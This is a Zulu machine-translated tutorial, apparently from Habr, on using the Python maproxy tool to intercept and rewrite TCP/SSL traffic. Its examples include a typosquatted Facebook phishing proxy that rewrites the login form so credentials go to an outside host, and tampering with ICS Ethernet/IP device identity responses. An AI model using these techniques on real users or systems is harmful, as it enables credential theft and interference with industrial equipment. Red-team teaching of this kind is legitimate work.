Ukuhunyushwa kwesihloko kwalungiselelwa ngobusuku bangaphambi kokuqala kwesifundo
isichasiselo
Izinhlobo ezihlukahlukene zokuhlola ukuphepha, kusukela ekuhlolweni kokungena okuvamile kanye nokusebenza kweThimba Elibomvu kuye ekugetshengeni amadivayisi e-IoT/ICS kanye ne-SCADA, kuhilela ukusebenza ngamaphrothokholi kanambambili wenethiwekhi, okusho ukuthi, ukungenelela kanye nokulungisa idatha yenethiwekhi phakathi kweklayenti nokuhlosiwe. Ukuhogela ithrafikhi yenethiwekhi akuwona umsebenzi onzima njengoba sinamathuluzi afana ne-Wireshark, i-Tcpdump noma i-Scapy, kodwa ukuguqulwa kubonakala kuwumsebenzi onzima kakhulu njengoba sizodinga ukuba nohlobo oluthile lwesixhumi esibonakalayo ukuze sifunde idatha yenethiwekhi, siyihlunge, siyishintshe. it on the fly bese uyithumela emuva kumsingathi oqondiwe cishe ngesikhathi sangempela. Ngaphezu kwalokho, kungaba kuhle uma ithuluzi elinjalo lingasebenza ngokuzenzakalelayo nokuxhumana okuningi okufanayo futhi lenze ngokwezifiso kusetshenziswa imibhalo.
Ngolunye usuku ngathola ithuluzi elithi
, imibhalo ngokushesha yakwenza kwacaca kimi ukuthi maproxy
– engikudingayo nje. Lona ummeleli we-TCP olula, oguquguqukayo futhi olungiseka kalula. Ngihlole leli thuluzi ezinhlelweni eziningi eziyinkimbinkimbi, kufaka phakathi amadivayisi e-ICS (akhiqiza amaphakethe amaningi) ukubona ukuthi angakwazi yini ukuphatha ukuxhumana okuningi okufanayo, futhi ithuluzi lenze kahle.
Lesi sihloko sizokwethula ekucubunguleni idatha yenethiwekhi uma uhamba usebenzisa maproxy
.
Uhlolojikelele
Insimbi maproxy
isuselwe ku-Tornado, uhlaka oludumile noluvuthiwe lwenethiwekhi ye-asynchronous e-Python.
Ngokuvamile, ingasebenza ngezindlela eziningana:
TCP:TCP
- ukuxhumana okungabhaliwe kwe-TCP;TCP:SSL
иSSL:TCP
- ngokubethela kwendlela eyodwa;SSL:SSL
- ukubethela kwezindlela ezimbili.
Iza njengomtapo wolwazi. Ukuze uqalise ngokushesha, ungasebenzisa amafayela ayisibonelo abonisa okuyinhloko
all.py
certificate.pem
logging_proxy.py
privatekey.pem
ssl2ssl.py
ssl2tcp.py
tcp2ssl.py
tcp2tcp.py
Ikesi 1 - ummeleli olula we-bidirectional
Ngokusekelwe ku tcp2tcp.py
:
#!/usr/bin/env python
import tornado.ioloop
import maproxy.proxyserver
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
tornado.ioloop.IOLoop.instance().start()
Ngokuzenzakalelayo ProxyServer()
ithatha izimpikiswano ezimbili - indawo yokuxhumana kanye nembobo eqondiwe. server.listen()
kuthatha impikiswano eyodwa - imbobo yokulalela uxhumano olungenayo.
Isebenzisa iskripthi:
# python tcp2tcp.py
Ukuze siqalise ukuhlolwa, sizoxhuma kuseva yendawo ye-SSH ngeskripthi sethu sommeleli, esilalela kuvuliwe. 2222/tcp
imbobo futhi ixhumeke embobeni ejwayelekile 22/tcp
Amaseva e-SSH:
Isibhengezo sokwamukela sikwazisa ukuthi iskripthi sethu esiyisibonelo senze ummeleli wethrafikhi yenethiwekhi ngempumelelo.
Icala 2 - ukuguqulwa kwedatha
Esinye iskripthi sedemo logging_proxy.py
ilungele ukuxhumana nedatha yenethiwekhi. Amazwana kufayela achaza izindlela zekilasi ongazilungisa ukuze ufinyelele umgomo wakho:
Into ethakazelisa kakhulu ilapha:
on_c2p_done_read
- ukunqamula idatha kusuka kuklayenti kuya kuseva;on_p2s_done_read
- kubuyiselwe emuva.
Ake sizame ukushintsha isibhengezo se-SSH iseva esibuyisela kuklayenti:
[…]
def on_p2s_done_read(self,data):
data = data.replace("OpenSSH", "DumnySSH")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
[…]
Yenza iskripthi:
Njengoba ubona, iklayenti lidukisiwe ngoba igama leseva yalo ye-SSH liye lashintshwa laba «DumnySSH»
.
Icala 3 – ikhasi lewebhu elilula lobugebengu bokweba imininingwane ebucayi
Kunezindlela ezingapheli zokusebenzisa leli thuluzi. Kulokhu ake sigxile kokuthile okusebenzayo okuvela ohlangothini lokusebenza lweQembu Elibomvu. Ake silingise ikhasi lokufika m.facebook.com
futhi usebenzise isizinda ngokwezifiso esinokuthayipha ngamabomu, isibonelo, m.facebok.com
. Ngezinjongo zokubonisa, ake sicabange nje ukuthi isizinda sibhaliswe yithi.
Sizosungula uxhumano lwenethiwekhi olungabetheliwe nommeleli wethu wezisulu kanye ne-SSL Stream kuseva ye-Facebook (31.13.81.36
). Ukuze senze lesi sibonelo sisebenze, sidinga ukushintsha isihloko somsingathi we-HTTP bese sijova igama lomethuleli elilungile, futhi sizovimbela ukucindezela kwempendulo ukuze sikwazi ukufinyelela kalula okuqukethwe. Ekugcineni sizongena esikhundleni sefomu le-HTML ukuze imininingwane yokungena ithunyelwe kithi esikhundleni seziphakeli ze-Facebook:
[…]
def on_c2p_done_read(self,data):
# replace Host header
data = data.replace("Host: m.facebok.com", "Host: m.facebook.com")
# disable compression
data = data.replace("gzip", "identity;q=0")
data = data.replace("deflate", "")
super(LoggingSession,self).on_c2p_done_read(data)
[…]
def on_p2s_done_read(self,data):
# partial replacement of response
data = data.replace("action="/zu/login/", "action="https://redteam.pl/")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("31.13.81.36",443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]
Ekugcineni:
Njengoba ubona, sikwazile ngempumelelo ukumiselela isayithi lokuqala.
Icala 4 - I-Porting Ethernet/IP
Bengilokhu ngisebenzelana nemishini yezimboni nesoftware (ICS/SCADA) isikhathi eside, njengezilawuli ezihlelekayo (PLC), amamojula we-I/O, amadrayivu, ama-relay, izindawo zokuhlela izitebhisi nokunye okuningi. Leli cala elalabo abathanda izinto zezimboni. Ukugebenga izixazululo ezinjalo kubandakanya ukudlala ngenkuthalo izivumelwano zenethiwekhi. Esibonelweni esilandelayo, ngingathanda ukukhombisa ukuthi ungashintsha kanjani ithrafikhi yenethiwekhi ye-ICS/SCADA.
Ukuze wenze lokhu uzodinga okulandelayo:
- I-sniffer yenethiwekhi, isibonelo, i-Wireshark;
- I-Ethernet/IP noma idivayisi ye-SIP nje, ungayithola usebenzisa isevisi ye-Shodan;
- Iskripthi sethu sisekelwe ku
maproxy
.
Okokuqala, ake sibheke ukuthi impendulo yokuhlonza ejwayelekile evela ku-CIP (Common Industrial Protocol) ibukeka kanjani:
Ukuhlonzwa kwedivayisi kwenziwa kusetshenziswa iphrothokholi ye-Ethernet/IP, okuyinguqulo ethuthukisiwe yephrothokholi ye-Ethernet yezimboni egoqa izivumelwano zokulawula ezifana ne-CIP. Sizoshintsha igama le-ID eligqanyisiwe elibonakala kusithombe-skrini "NI-IndComm ye-Ethernet" usebenzisa iskripthi sethu sommeleli. Singaphinda sisebenzise umbhalo logging_proxy.py
futhi ngokufanayo uguqule indlela yekilasi on_p2s_done_read
, ngoba sifuna igama likamazisi elihlukile libonakale kuklayenti.
Ikhodi:
[…]
def on_p2s_done_read(self,data):
# partial replacement of response
# Checking if we got List Identity message response
if data[26:28] == b'x0cx00':
print('Got response, replacing')
data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("1.3.3.7",44818,session_factory=LoggingSessionFactory())
server.listen(44818)
[…]
Empeleni, sicele ukuhlonzwa kwedivayisi kabili, impendulo yesibili kwaba eyokuqala, futhi eyokuqala yashintshwa ngokushesha.
Futhi okokugcina
Ngombono wami maproxy
Ithuluzi elilula nelilula, elibhalwe nange-Python, ngakho-ke ngikholelwa ukuthi nawe ungazuza ngokulisebenzisa. Yiqiniso, kunamathuluzi ayinkimbinkimbi kakhulu okucubungula nokuguqula idatha yenethiwekhi, kodwa futhi adinga ukunakwa okwengeziwe futhi ngokuvamile adalelwa icala elithile lokusetshenziswa, isb. maproxy
ungakwazi ukusebenzisa ngokushesha imibono yakho ukuze ubambe idatha yenethiwekhi, njengoba imibhalo eyisibonelo icace kakhulu.
Source: www.habr.com